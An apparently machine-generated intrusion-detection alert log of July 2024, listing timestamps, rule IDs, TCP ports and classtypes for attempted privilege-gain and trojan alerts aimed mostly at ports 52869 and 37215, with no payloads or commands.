                      Timestamp:07/20/24-23:05:47.464031
                      SID:2025132
                      Source Port:38982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.900578
                      SID:2025132
                      Source Port:49674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.841638
                      SID:2027339
                      Source Port:57696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.863826
                      SID:2835222
                      Source Port:40396
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.405141
                      SID:2025132
                      Source Port:33496
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.898489
                      SID:2025132
                      Source Port:50158
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.716986
                      SID:2027339
                      Source Port:57234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.464031
                      SID:2025132
                      Source Port:36538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:44.688793
                      SID:2831300
                      Source Port:51540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.375806
                      SID:2025132
                      Source Port:59334
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.746218
                      SID:2027339
                      Source Port:52852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:19.930679
                      SID:2025132
                      Source Port:49380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.994638
                      SID:2027339
                      Source Port:60588
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325773
                      SID:2835222
                      Source Port:48816
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.613195
                      SID:2027339
                      Source Port:44318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.143329
                      SID:2025132
                      Source Port:32932
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.768266
                      SID:2831300
                      Source Port:48528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.127169
                      SID:2829579
                      Source Port:38306
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.245949
                      SID:2829579
                      Source Port:41378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.851987
                      SID:2025132
                      Source Port:43776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.504672
                      SID:2831300
                      Source Port:59712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.071790
                      SID:2027339
                      Source Port:34558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.935593
                      SID:2831300
                      Source Port:42288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:44.984925
                      SID:2027339
                      Source Port:38206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.070646
                      SID:2027339
                      Source Port:52872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.374653
                      SID:2835222
                      Source Port:60324
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.144593
                      SID:2027339
                      Source Port:38672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.384826
                      SID:2025132
                      Source Port:41148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.592874
                      SID:2835222
                      Source Port:44472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:08.490661
                      SID:2831300
                      Source Port:40928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.198584
                      SID:2027339
                      Source Port:35552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.470061
                      SID:2027339
                      Source Port:44938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.508652
                      SID:2027339
                      Source Port:54744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.555463
                      SID:2027339
                      Source Port:40984
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.997543
                      SID:2027339
                      Source Port:36560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.188540
                      SID:2027339
                      Source Port:54476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.652415
                      SID:2027339
                      Source Port:35892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.494675
                      SID:2027339
                      Source Port:49616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.328788
                      SID:2027339
                      Source Port:44640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.534266
                      SID:2027339
                      Source Port:39190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.507455
                      SID:2025132
                      Source Port:34118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.698381
                      SID:2025132
                      Source Port:41428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.561304
                      SID:2025132
                      Source Port:33204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:24.304142
                      SID:2025132
                      Source Port:42484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.829338
                      SID:2829579
                      Source Port:51272
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.648686
                      SID:2025132
                      Source Port:56012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:44.364114
                      SID:2831300
                      Source Port:55246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.945198
                      SID:2835222
                      Source Port:33862
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.102064
                      SID:2025132
                      Source Port:33846
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.443569
                      SID:2027339
                      Source Port:34280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.014485
                      SID:2027339
                      Source Port:56328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.354373
                      SID:2829579
                      Source Port:54522
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.207184
                      SID:2831300
                      Source Port:59602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.453622
                      SID:2831300
                      Source Port:49212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.233976
                      SID:2025132
                      Source Port:46676
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.963175
                      SID:2025132
                      Source Port:44422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.592911
                      SID:2025132
                      Source Port:36374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.229188
                      SID:2027339
                      Source Port:44404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.603344
                      SID:2027339
                      Source Port:52210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.119639
                      SID:2835222
                      Source Port:58642
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:14.413410
                      SID:2025132
                      Source Port:36098
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.440618
                      SID:2831300
                      Source Port:60114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.414364
                      SID:2027339
                      Source Port:59770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.460952
                      SID:2027339
                      Source Port:60318
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.394385
                      SID:2027339
                      Source Port:39062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.763323
                      SID:2829579
                      Source Port:59256
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.038244
                      SID:2829579
                      Source Port:56880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.470172
                      SID:2027339
                      Source Port:50004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.532321
                      SID:2831300
                      Source Port:40792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.354373
                      SID:2835222
                      Source Port:35112
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.559457
                      SID:2025132
                      Source Port:55664
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.517011
                      SID:2831300
                      Source Port:60306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.078658
                      SID:2831300
                      Source Port:53476
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.475871
                      SID:2027339
                      Source Port:59478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.435340
                      SID:2027339
                      Source Port:48520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.649436
                      SID:2027339
                      Source Port:58032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.180793
                      SID:2027339
                      Source Port:52988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.858199
                      SID:2829579
                      Source Port:44918
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.051467
                      SID:2027339
                      Source Port:52672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.043403
                      SID:2025132
                      Source Port:46360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.762457
                      SID:2027339
                      Source Port:50672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.551649
                      SID:2831300
                      Source Port:43726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.845937
                      SID:2027339
                      Source Port:49392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.139794
                      SID:2025132
                      Source Port:58150
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.748554
                      SID:2835222
                      Source Port:47664
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:50.079146
                      SID:2027339
                      Source Port:54916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.149453
                      SID:2027339
                      Source Port:55388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.736138
                      SID:2027339
                      Source Port:40120
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.444466
                      SID:2831300
                      Source Port:32980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.426800
                      SID:2027339
                      Source Port:56228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.442399
                      SID:2027339
                      Source Port:60674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.166360
                      SID:2027339
                      Source Port:54686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.188292
                      SID:2027339
                      Source Port:36430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:20.610603
                      SID:2831300
                      Source Port:48380
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.223936
                      SID:2027339
                      Source Port:45822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.872548
                      SID:2027339
                      Source Port:57704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.749158
                      SID:2027339
                      Source Port:55916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.022964
                      SID:2835222
                      Source Port:60156
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.195412
                      SID:2027339
                      Source Port:44296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:56.433850
                      SID:2027339
                      Source Port:40620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.855567
                      SID:2829579
                      Source Port:54158
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.707199
                      SID:2027339
                      Source Port:57096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.046185
                      SID:2027339
                      Source Port:35244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.128245
                      SID:2027339
                      Source Port:48040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.441224
                      SID:2831300
                      Source Port:57740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.482880
                      SID:2027339
                      Source Port:58122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.415063
                      SID:2027339
                      Source Port:52774
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.651508
                      SID:2027339
                      Source Port:33502
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.357307
                      SID:2831300
                      Source Port:40834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.760150
                      SID:2025132
                      Source Port:48626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.526744
                      SID:2831300
                      Source Port:48926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:16.855430
                      SID:2027339
                      Source Port:50262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.107529
                      SID:2027339
                      Source Port:41924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.761892
                      SID:2027339
                      Source Port:35230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.324002
                      SID:2025132
                      Source Port:46164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.485640
                      SID:2831300
                      Source Port:46422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.648426
                      SID:2835222
                      Source Port:46926
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.780090
                      SID:2829579
                      Source Port:39734
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.405141
                      SID:2027339
                      Source Port:54354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:33.411817
                      SID:2027339
                      Source Port:35976
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.746493
                      SID:2025132
                      Source Port:47190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.728680
                      SID:2027339
                      Source Port:45702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.460621
                      SID:2027339
                      Source Port:51636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:31.773037
                      SID:2025132
                      Source Port:45584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.454427
                      SID:2831300
                      Source Port:55466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.110617
                      SID:2027339
                      Source Port:50072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:22.097094
                      SID:2027339
                      Source Port:44064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.112950
                      SID:2027339
                      Source Port:39520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.771399
                      SID:2835222
                      Source Port:58900
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.501695
                      SID:2027339
                      Source Port:39642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:17.337182
                      SID:2027339
                      Source Port:41374
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.901932
                      SID:2027339
                      Source Port:49280
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.625091
                      SID:2025132
                      Source Port:53744
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.787088
                      SID:2027339
                      Source Port:60856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323663
                      SID:2835222
                      Source Port:48544
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.139895
                      SID:2025132
                      Source Port:47894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:20.550859
                      SID:2027339
                      Source Port:39608
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:32.121311
                      SID:2027339
                      Source Port:38922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:04.345966
                      SID:2027339
                      Source Port:39134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.540944
                      SID:2025132
                      Source Port:50272
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:56.793781
                      SID:2831300
                      Source Port:46762
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.257816
                      SID:2829579
                      Source Port:48098
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.198211
                      SID:2027339
                      Source Port:34238
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.508652
                      SID:2831300
                      Source Port:40980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:10.556359
                      SID:2025132
                      Source Port:56220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:54.322182
                      SID:2025132
                      Source Port:60386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.513809
                      SID:2025132
                      Source Port:57834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.540434
                      SID:2027339
                      Source Port:39614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.314185
                      SID:2025132
                      Source Port:55454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.899872
                      SID:2027339
                      Source Port:51996
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.942639
                      SID:2025132
                      Source Port:48000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.277784
                      SID:2027339
                      Source Port:56794
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.496382
                      SID:2831300
                      Source Port:44690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.617831
                      SID:2025132
                      Source Port:48978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:34.155225
                      SID:2027339
                      Source Port:35032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.384426
                      SID:2025132
                      Source Port:48694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.084394
                      SID:2831300
                      Source Port:47236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.679529
                      SID:2831300
                      Source Port:45642
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.295861
                      SID:2025132
                      Source Port:40972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.436396
                      SID:2027339
                      Source Port:51570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.088778
                      SID:2835222
                      Source Port:46180
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.435096
                      SID:2835222
                      Source Port:39132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.849532
                      SID:2027339
                      Source Port:36694
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.526744
                      SID:2831300
                      Source Port:48702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.457644
                      SID:2027339
                      Source Port:44452
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.757977
                      SID:2027339
                      Source Port:41126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.355766
                      SID:2831300
                      Source Port:50320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.903734
                      SID:2025132
                      Source Port:52924
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.313457
                      SID:2025132
                      Source Port:54190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.190685
                      SID:2831300
                      Source Port:33404
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.429547
                      SID:2831300
                      Source Port:53434
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.464785
                      SID:2027339
                      Source Port:48726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.107643
                      SID:2027339
                      Source Port:52982
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.414252
                      SID:2025132
                      Source Port:43714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.325898
                      SID:2835222
                      Source Port:42040
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.368314
                      SID:2831300
                      Source Port:55654
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.108564
                      SID:2835222
                      Source Port:53148
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.526128
                      SID:2027339
                      Source Port:40328
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.625708
                      SID:2835222
                      Source Port:49580
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.382027
                      SID:2025132
                      Source Port:50598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
